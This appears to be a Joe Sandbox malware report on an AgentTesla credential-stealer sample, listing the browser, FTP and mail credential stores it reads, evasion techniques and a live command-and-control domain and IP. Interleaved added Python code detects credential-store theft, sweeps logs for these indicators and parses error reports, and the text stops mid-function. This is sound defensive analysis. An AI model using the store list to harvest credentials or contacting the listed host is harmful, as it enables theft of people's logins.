Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-AppV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformation
Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe | Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Users\user\Desktop\20240328-REV2.exe VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Security\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Security.dll VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Web.Extensions\v4.0_4.0.0.0__31bf3856ad364e35\System.Web.Extensions.dll VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
Source: C:\Users\user\Desktop\20240328-REV2.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
Source: Amcache.hve.8.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
Source: Amcache.hve.8.dr | Binary or memory string: msmpeng.exe
Source: Amcache.hve.8.dr | Binary or memory string: c:\program files\windows defender\msmpeng.exe
Source: Amcache.hve.8.dr | Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
Source: Amcache.hve.8.dr | Binary or memory string: MsMpEng.exe

                        Stealing of Sensitive Information

                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.436e7a0.7.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.4345780.6.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 5.2.20240328-REV2.exe.400000.0.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.436e7a0.7.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000005.00000002.2743308776.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000001.00000002.1582368712.0000000004187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: dump.pcap, type: PCAP
                        Source: Yara matchFile source: 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: 00000005.00000002.2747010558.0000000002941000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                        Source: Yara matchFile source: Process Memory Space: 20240328-REV2.exe PID: 4788, type: MEMORYSTR
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.6d50000.10.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.6d50000.10.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.3799970.8.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, type: UNPACKEDPE
                        Source: Yara matchFile source: 00000001.00000002.1585065911.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.1582368712.0000000003799000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: C:\Users\user\Desktop\20240328-REV2.exe, Key opened: HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions
Source: C:\Users\user\Desktop\20240328-REV2.exe, File opened: C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data
Source: C:\Users\user\Desktop\20240328-REV2.exe, File opened: C:\Users\user\AppData\Roaming\8pecxstudios\Cyberfox\profiles.ini
Source: C:\Users\user\Desktop\20240328-REV2.exe, File opened: C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini
Source: C:\Users\user\Desktop\20240328-REV2.exe, File opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data
Source: C:\Users\user\Desktop\20240328-REV2.exe, File opened: C:\Users\user\AppData\Roaming\NETGATE Technologies\BlackHawk\profiles.ini
Source: C:\Users\user\Desktop\20240328-REV2.exe, File opened: C:\FTP Navigator\Ftplist.txt
Source: C:\Users\user\Desktop\20240328-REV2.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\20240328-REV2.exe, File opened: C:\Users\user\AppData\Roaming\Thunderbird\profiles.ini
Source: C:\Users\user\Desktop\20240328-REV2.exe, Key opened: HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
Source: C:\Users\user\Desktop\20240328-REV2.exe, Key opened: HKEY_CURRENT_USER\Software\IncrediMail\Identities
Source: Yara match, file source: 00000005.00000002.2747010558.0000000002941000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: 20240328-REV2.exe PID: 4788, type: MEMORYSTR
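The file and registry accesses listed above are the raw material for a detection: a single process reading the credential stores of several unrelated products is the stealer pattern these signatures describe. The following is an added example, not part of the Joe Sandbox report. It encodes the store locations the report shows the sample opening as path patterns, flags any process other than the store's own application reading them, and counts how many distinct product families one process touched. The owner process names and the Sysmon-style event records are assumptions constructed for the example.

```python
"""Flag reads of credential stores by processes that do not own them.

Added example, not part of the Joe Sandbox report. The store locations are
the file paths and registry keys the report shows the sample opening; the
owner process names and the event records below are assumptions/constructed.
"""
from collections import defaultdict
from fnmatch import fnmatchcase

# (product family, lowercase glob over file path or registry key, processes allowed to read it)
# Owner names are assumptions; an empty set would mean "no process may read this".
CREDENTIAL_STORES = [
    ("chrome",       r"*\google\chrome\user data\*\login data",          {"chrome.exe"}),
    ("edge",         r"*\microsoft\edge\user data\*\login data",         {"msedge.exe"}),
    ("firefox",      r"*\mozilla\firefox\profiles.ini",                  {"firefox.exe"}),
    ("cyberfox",     r"*\8pecxstudios\cyberfox\profiles.ini",            {"cyberfox.exe"}),
    ("blackhawk",    r"*\netgate technologies\blackhawk\profiles.ini",   {"blackhawk.exe"}),
    ("thunderbird",  r"*\thunderbird\profiles.ini",                      {"thunderbird.exe"}),
    ("ftpnavigator", r"*\ftp navigator\ftplist.txt",                     {"ftpnavigator.exe"}),
    ("winscp",       r"hkey_current_user\software\martin prikryl\winscp 2\sessions*", {"winscp.exe"}),
    ("outlook",      r"hkey_current_user\software\microsoft\windows nt\currentversion"
                     r"\windows messaging subsystem\profiles\*",          {"outlook.exe"}),
    ("incredimail",  r"hkey_current_user\software\incredimail\identities*", {"incredimail.exe"}),
]


def classify(target):
    """Return (family, owners) if target is a known credential store, else None."""
    t = target.lower()
    for family, pattern, owners in CREDENTIAL_STORES:
        if fnmatchcase(t, pattern):      # backslash is literal in fnmatch, '*' spans separators
            return family, owners
    return None


def flag_credential_access(events, min_families=3):
    """events: iterable of {"image": <process path>, "target": <file path or registry key>}.

    Returns (flags, stealers):
      flags    - [(image, family, target)] for every read by a non-owner process
      stealers - {image name: sorted families} for processes that touched at least
                 min_families distinct products, the breadth pattern of a stealer
    """
    flags = []
    touched = defaultdict(set)
    for ev in events:
        hit = classify(ev["target"])
        if hit is None:
            continue
        family, owners = hit
        name = ev["image"].rsplit("\\", 1)[-1].lower()
        if name in owners:
            continue                     # the application reading its own store
        flags.append((ev["image"], family, ev["target"]))
        touched[name].add(family)
    stealers = {n: sorted(f) for n, f in touched.items() if len(f) >= min_families}
    return flags, stealers


# Constructed events (Sysmon-style file/registry reads), not taken from the report's log.
SAMPLE_EVENTS = [
    {"image": r"C:\Program Files\Google\Chrome\Application\chrome.exe",
     "target": r"C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Login Data"},
    {"image": r"C:\Users\user\Desktop\20240328-REV2.exe",
     "target": r"HKEY_CURRENT_USER\SOFTWARE\Martin Prikryl\WinSCP 2\Sessions"},
    {"image": r"C:\Users\user\Desktop\20240328-REV2.exe",
     "target": r"C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Login Data"},
    {"image": r"C:\Users\user\Desktop\20240328-REV2.exe",
     "target": r"C:\Users\user\AppData\Roaming\Mozilla\Firefox\profiles.ini"},
    {"image": r"C:\Users\user\Desktop\20240328-REV2.exe",
     "target": r"C:\FTP Navigator\Ftplist.txt"},
    {"image": r"C:\Users\user\Desktop\20240328-REV2.exe",
     "target": r"HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion"
               r"\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676"},
    {"image": r"C:\Users\user\Desktop\20240328-REV2.exe",
     "target": r"C:\Users\user\Documents\notes.txt"},
]

if __name__ == "__main__":
    flags, stealers = flag_credential_access(SAMPLE_EVENTS)
    for image, family, target in flags:
        print(f"FLAG {image} -> [{family}] {target}")
    print("stealer candidates:", stealers)
```

Chrome reading its own Login Data is dropped by the owner check; the sample reading five different products' stores is flagged on every event and surfaces as a stealer candidate. In production the owner set needs the signed-binary check as well, since a stealer that injects into chrome.exe inherits the image name.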

                        Remote Access Functionality

Source: Yara match, file source: 1.2.20240328-REV2.exe.436e7a0.7.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.20240328-REV2.exe.4345780.6.unpack, type: UNPACKEDPE
Source: Yara match, file source: 5.2.20240328-REV2.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.20240328-REV2.exe.436e7a0.7.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.20240328-REV2.exe.4345780.6.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000005.00000002.2743308776.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.1582368712.0000000004187000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: dump.pcap, type: PCAP
Source: Yara match, file source: 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000005.00000002.2747010558.0000000002941000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: Process Memory Space: 20240328-REV2.exe PID: 4788, type: MEMORYSTR
Source: Yara match, file source: 1.2.20240328-REV2.exe.6d50000.10.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.20240328-REV2.exe.6d50000.10.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.20240328-REV2.exe.3799970.8.unpack, type: UNPACKEDPE
Source: Yara match, file source: 1.2.20240328-REV2.exe.3799970.8.raw.unpack, type: UNPACKEDPE
Source: Yara match, file source: 00000001.00000002.1585065911.0000000006D50000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match, file source: 00000001.00000002.1582368712.0000000003799000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
MITRE ATT&CK Matrix (techniques flagged by the analysis, grouped by tactic; the leading digits are the count badges rendered in each matrix cell, unflagged placeholder cells are omitted)

Reconnaissance: none flagged
Resource Development: none flagged
Initial Access: none flagged
Execution: 121 Windows Management Instrumentation
Persistence: 1 DLL Side-Loading
Privilege Escalation: 111 Process Injection; 1 DLL Side-Loading
Defense Evasion: 1 Masquerading; 11 Disable or Modify Tools; 151 Virtualization/Sandbox Evasion; 111 Process Injection; 1 Deobfuscate/Decode Files or Information; 2 Obfuscated Files or Information; 22 Software Packing; 1 Timestomp; 1 DLL Side-Loading
Credential Access: 2 OS Credential Dumping; 1 Credentials in Registry
Discovery: 131 Security Software Discovery; 1 Process Discovery; 151 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 1 File and Directory Discovery; 24 System Information Discovery
Lateral Movement: none flagged
Collection: 1 Email Collection; 11 Archive Collected Data; 2 Data from Local System
Command and Control: 1 Encrypted Channel; 1 Non-Standard Port; 1 Non-Application Layer Protocol; 11 Application Layer Protocol
Exfiltration: none flagged
Impact: none flagged
Source | Detection | Scanner | Label | Link
20240328-REV2.exe | 45% | ReversingLabs | ByteCode-MSIL.Trojan.AgentTesla |
20240328-REV2.exe | 44% | Virustotal | | Browse
20240328-REV2.exe | 100% | Joe Sandbox ML | |
No Antivirus matches
No Antivirus matches
Source | Detection | Scanner | Label | Link
mbarieservicesltd.com | 1% | Virustotal | | Browse
mail.mbarieservicesltd.com | 5% | Virustotal | | Browse
Source | Detection | Scanner | Label | Link
http://mail.mbarieservicesltd.com | 100% | Avira URL Cloud | malware |
http://mbarieservicesltd.com | 0% | Avira URL Cloud | safe |
http://mbarieservicesltd.com | 1% | Virustotal | | Browse
http://mail.mbarieservicesltd.com | 5% | Virustotal | | Browse
Name | IP | Active | Malicious | Antivirus Detection | Reputation
mbarieservicesltd.com | 199.79.62.115 | true | true | | unknown
mail.mbarieservicesltd.com | unknown | unknown | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://upx.sf.net | Amcache.hve.8.dr | false | | high
http://mbarieservicesltd.com | 20240328-REV2.exe, 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmp | false | 1%, Virustotal, Browse; Avira URL Cloud: safe | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 20240328-REV2.exe, 00000001.00000002.1581428931.000000000280D000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://mail.mbarieservicesltd.com | 20240328-REV2.exe, 00000005.00000002.2747010558.000000000299A000.00000004.00000800.00020000.00000000.sdmp | false | 5%, Virustotal, Browse; Avira URL Cloud: malware | unknown
IP | Domain | Country | ASN | ASN Name | Malicious
199.79.62.115 | mbarieservicesltd.com | United States | 394695 | PUBLIC-DOMAIN-REGISTRYUS | true
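The network indicators above (the domain, its mail. subdomain and the resolved IP) are what a responder sweeps logs for. The following added example, not part of the Joe Sandbox report, does that sweep over DNS, proxy and flow lines. The matching rule is the part that matters: the domain is matched as a DNS-label suffix, so mail.mbarieservicesltd.com matches but a look-alike such as notmbarieservicesltd.com does not, and IPv4 candidates are validated with ipaddress before comparison. The log lines are constructed; the report does not show the destination port, so the flow line carries none.

```python
"""Sweep network log lines for the report's network IOCs.

Added example, not part of the Joe Sandbox report. The indicators are the
domain and IP from the tables above; the log lines are constructed.
Matching is by DNS-label suffix so that look-alike names do not match.
"""
import ipaddress
import re

DOMAIN_IOCS = {"mbarieservicesltd.com"}      # mail.mbarieservicesltd.com is covered by the suffix rule
IP_IOCS = {ipaddress.ip_address("199.79.62.115")}

_HOST_RE = re.compile(r"(?i)\b((?:[a-z0-9-]+\.)+[a-z]{2,})\b")   # dotted name ending in a letter label
_IPV4_RE = re.compile(r"\b(?:\d{1,3}\.){3}\d{1,3}\b")


def domain_matches(host, iocs=DOMAIN_IOCS):
    """True for the IOC domain itself or any label under it; never for look-alikes."""
    host = host.lower().rstrip(".")
    return any(host == d or host.endswith("." + d) for d in iocs)


def scan_line(line, domain_iocs=DOMAIN_IOCS, ip_iocs=IP_IOCS):
    """Return [(kind, indicator)] hits for one log line of any format."""
    hits = []
    for host in sorted(set(_HOST_RE.findall(line))):
        if domain_matches(host, domain_iocs):
            hits.append(("domain", host.lower()))
    for raw in _IPV4_RE.findall(line):
        try:
            if ipaddress.ip_address(raw) in ip_iocs:
                hits.append(("ip", raw))
        except ValueError:                 # e.g. 999.1.1.1 looks like an address but is not one
            continue
    return hits


def scan_log(lines):
    """Return [(1-based line number, hits)] for every line with at least one hit."""
    results = []
    for n, line in enumerate(lines, 1):
        hits = scan_line(line)
        if hits:
            results.append((n, hits))
    return results


# Constructed log lines; the destination port is deliberately absent (not shown in the report).
SAMPLE_LOG = [
    "2024-04-26T08:06:29Z dns  client=10.0.0.5 query=mail.mbarieservicesltd.com type=A",
    "2024-04-26T08:06:30Z flow client=10.0.0.5 server=199.79.62.115 proto=tcp bytes=4096",
    "2024-04-26T08:06:31Z http client=10.0.0.7 url=http://notmbarieservicesltd.com/index.html",
    "2024-04-26T08:06:32Z dns  client=10.0.0.9 query=fs.microsoft.com type=A",
]

if __name__ == "__main__":
    for lineno, hits in scan_log(SAMPLE_LOG):
        print(lineno, hits)
```

Lines 1 and 2 hit (the subdomain and the IP); the look-alike on line 3 and the benign Microsoft lookup on line 4 do not. Substring matching, the usual shortcut, would have flagged line 3.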
                            Joe Sandbox version:40.0.0 Tourmaline
                            Analysis ID:1432024
                            Start date and time:2024-04-26 10:05:18 +02:00
                            Joe Sandbox product:CloudBasic
                            Overall analysis duration:0h 7m 28s
                            Hypervisor based Inspection enabled:false
                            Report type:full
                            Cookbook file name:default.jbs
                            Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
Number of new started processes analysed:17
                            Number of new started drivers analysed:0
                            Number of existing processes analysed:0
                            Number of existing drivers analysed:0
                            Number of injected processes analysed:0
                            Technologies:
                            • HCA enabled
                            • EGA enabled
                            • AMSI enabled
                            Analysis Mode:default
                            Analysis stop reason:Timeout
                            Sample name:20240328-REV2.exe
                            Detection:MAL
                            Classification:mal100.troj.spyw.evad.winEXE@8/11@1/1
                            EGA Information:
                            • Successful, ratio: 100%
                            HCA Information:
                            • Successful, ratio: 98%
                            • Number of executed functions: 149
                            • Number of non-executed functions: 27
                            Cookbook Comments:
                            • Found application associated with file extension: .exe
                            • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, WerFault.exe, WMIADAP.exe, SIHClient.exe, conhost.exe, svchost.exe
                            • Excluded IPs from analysis (whitelisted): 20.189.173.22
                            • Excluded domains from analysis (whitelisted): fs.microsoft.com, ocsp.digicert.com, login.live.com, slscr.update.microsoft.com, blobcollector.events.data.trafficmanager.net, onedsblobprdwus17.westus.cloudapp.azure.com, ctldl.windowsupdate.com, umwatson.events.data.microsoft.com, fe3cr.delivery.mp.microsoft.com
• Not all processes were analyzed, report is missing behavior information
                            • Report size exceeded maximum capacity and may have missing behavior information.
                            • Report size getting too big, too many NtCreateKey calls found.
                            • Report size getting too big, too many NtOpenKeyEx calls found.
                            • Report size getting too big, too many NtProtectVirtualMemory calls found.
                            • Report size getting too big, too many NtQueryValueKey calls found.
                            • Report size getting too big, too many NtSetInformationFile calls found.
Time | Type | Description
10:06:25 | API Interceptor | 22x Sleep call for process: 20240328-REV2.exe modified
10:06:27 | API Interceptor | 15x Sleep call for process: powershell.exe modified
10:06:33 | API Interceptor | 1x Sleep call for process: WerFault.exe modified
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
199.79.62.115 | PO82100088.exe | Get hash | malicious | AgentTesla | Browse |
 | WNGO8CYRZG.exe | Get hash | malicious | AgentTesla | Browse |
 | F0A7vyQAuZ.exe | Get hash | malicious | AgentTesla | Browse |
 | quote N4302-088.exe | Get hash | malicious | AgentTesla | Browse |
 | Quote#U00a0UPDATE#U00a0#U00a027-03-24.exe | Get hash | malicious | AgentTesla | Browse |
 | Quote_Q9555.exe | Get hash | malicious | AgentTesla | Browse |
 | Quote#U00a0UPDATE#U00a0#U00a027-03-24.exe | Get hash | malicious | AgentTesla | Browse |
 | 124431-OFFER.exe | Get hash | malicious | AgentTesla | Browse |
 | Quote_90002010.exe | Get hash | malicious | AgentTesla | Browse |
 | PO234400.exe | Get hash | malicious | AgentTesla | Browse |
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
PUBLIC-DOMAIN-REGISTRYUS | Payment.exe | Get hash | malicious | AgentTesla | Browse | 208.91.198.143
 | SecuriteInfo.com.Win32.PWSX-gen.29608.5434.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 208.91.199.224
 | Dhl Express Shipping Docs .pdf.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.223
 | BARSYL SHIPPING Co (VIETNAM).exe | Get hash | malicious | AgentTesla | Browse | 207.174.215.249
 | PR2403016.scr.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.223
 | BARSYL SHIPPING Co (VIETNAM).exe | Get hash | malicious | AgentTesla | Browse | 207.174.215.249
 | OKJ2402PRT000025.PDF.scr.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.224
 | PO82100088.exe | Get hash | malicious | AgentTesla | Browse | 199.79.62.115
 | BARSYL SHIPPING Co (VIETNAM).exe | Get hash | malicious | AgentTesla | Browse | 162.215.248.214
 | Urgent PO 18-3081 Confirmation.exe | Get hash | malicious | AgentTesla | Browse | 208.91.199.224
                                                No context
                                                No context
                                                Process:C:\Windows\SysWOW64\WerFault.exe
                                                File Type:Unicode text, UTF-16, little-endian text, with CRLF line terminators
                                                Category:dropped
                                                Size (bytes):65536
                                                Entropy (8bit):1.2832140247113648
                                                Encrypted:false
                                                SSDEEP:192:mxghY+0BU/iaGOJo1ZrFHqozuiFPZ24IO8r:kghCBU/iahMrzuiFPY4IO8r
                                                MD5:A2010789470B29C8154CF3AC293574EA
                                                SHA1:EEEDE969E6723B572B6A019824C49DE8126FCE05
                                                SHA-256:2BE9EC8A56CFF7508FBBE2822C156BF4A098FE579FC3C89D01B972DED9CD8D3D
                                                SHA-512:B99F697F18099C1E37915FBEB7143A208EFB062877E171AD31BBDB0F2E3AD9BE7246B64FC156F2EA3DB924E9A9B49E1E8373027599A837EA1CFBBAF01FE42E3D
                                                Malicious:false
                                                Reputation:low
                                                Preview:..V.e.r.s.i.o.n.=.1.....E.v.e.n.t.T.y.p.e.=.C.L.R.2.0.r.3.....E.v.e.n.t.T.i.m.e.=.1.3.3.5.8.5.9.2.3.8.7.6.0.2.0.1.9.5.....R.e.p.o.r.t.T.y.p.e.=.2.....C.o.n.s.e.n.t.=.1.....U.p.l.o.a.d.T.i.m.e.=.1.3.3.5.8.5.9.2.3.8.8.7.1.1.3.8.5.5.....R.e.p.o.r.t.S.t.a.t.u.s.=.5.2.4.3.8.4.....R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.f.5.4.6.9.8.1.a.-.4.c.8.e.-.4.7.3.4.-.9.0.7.4.-.2.3.d.8.1.c.8.6.1.b.0.4.....I.n.t.e.g.r.a.t.o.r.R.e.p.o.r.t.I.d.e.n.t.i.f.i.e.r.=.1.1.1.b.6.7.9.a.-.5.0.1.b.-.4.8.5.4.-.8.f.0.d.-.b.c.6.7.d.9.1.4.b.0.7.8.....W.o.w.6.4.H.o.s.t.=.3.4.4.0.4.....W.o.w.6.4.G.u.e.s.t.=.3.3.2.....N.s.A.p.p.N.a.m.e.=.2.0.2.4.0.3.2.8.-.R.E.V.2...e.x.e.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e.=.X.Z.W...e.x.e.....A.p.p.S.e.s.s.i.o.n.G.u.i.d.=.0.0.0.0.1.a.b.8.-.0.0.0.1.-.0.0.1.4.-.c.c.3.0.-.2.c.a.2.b.0.9.7.d.a.0.1.....T.a.r.g.e.t.A.p.p.I.d.=.W.:.0.0.0.6.9.5.1.e.f.b.7.d.8.8.b.b.f.d.1.3.c.c.9.b.4.2.c.3.0.0.e.f.a.6.d.d.0.0.0.0.0.0.0.0.!.0.0.0.0.a.4.2.e.b.4.e.6.0.8.4.a.c.9.1.d.1.f.a.d.3.e.f.9.f.e.0.1.d.8.d.3.e.9.d.b.0.c.
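The WerFault.exe drop above is a Windows Error Reporting report: UTF-16 text with a byte-order mark, CRLF line ends and key=value lines (the preview shows the NUL bytes as dots). It records EventType CLR20r3, the WER event type for an unhandled .NET exception, an on-disk name (NsAppName) that differs from the version-resource name (OriginalFilename=XZW.exe), and a TargetAppId whose second '!'-separated field carries the SHA-1 of the crashed binary, which lets a responder tie the report to a file even after it has been deleted. The following added example, not part of the Joe Sandbox report, parses such a file and extracts those fields. The sample bytes are constructed from the preview; the preview truncates the SHA-1 inside TargetAppId, so a placeholder value is used there.

```python
"""Pull identifying fields out of a Windows Error Reporting (WER) report file
like the first dropped file above: UTF-16 text with a BOM, CRLF line ends and
key=value lines (the preview renders the NUL bytes as dots).

Added example, not part of the Joe Sandbox report. The field values in
SAMPLE_WER are copied from that preview except the SHA-1 inside TargetAppId,
which the preview truncates and which is replaced here by a placeholder.
"""
from datetime import datetime, timedelta, timezone

FILETIME_EPOCH = datetime(1601, 1, 1, tzinfo=timezone.utc)


def parse_wer(data: bytes) -> dict:
    """Decode a .wer file into a key -> value dict (a later duplicate key wins)."""
    text = data.decode("utf-16")           # the BOM (FF FE) selects the byte order
    fields = {}
    for line in text.splitlines():
        key, sep, value = line.partition("=")
        if sep:
            fields[key.strip()] = value.strip()
    return fields


def filetime_to_datetime(ticks: str) -> datetime:
    """EventTime/UploadTime are FILETIME values: 100 ns ticks since 1601-01-01 UTC."""
    return FILETIME_EPOCH + timedelta(microseconds=int(ticks) // 10)


def split_target_app_id(app_id: str) -> dict:
    """TargetAppId is 'W:<app hash>!0000<SHA-1 of the crashed file>!<file name>'."""
    parts = app_id.split("!")
    out = {"app_hash": parts[0].split(":", 1)[-1], "binary_sha1": None, "file_name": None}
    if len(parts) > 1 and parts[1].startswith("0000") and len(parts[1]) == 44:
        out["binary_sha1"] = parts[1][4:].lower()
    if len(parts) > 2:
        out["file_name"] = parts[2]
    return out


def summarize_wer(fields: dict) -> dict:
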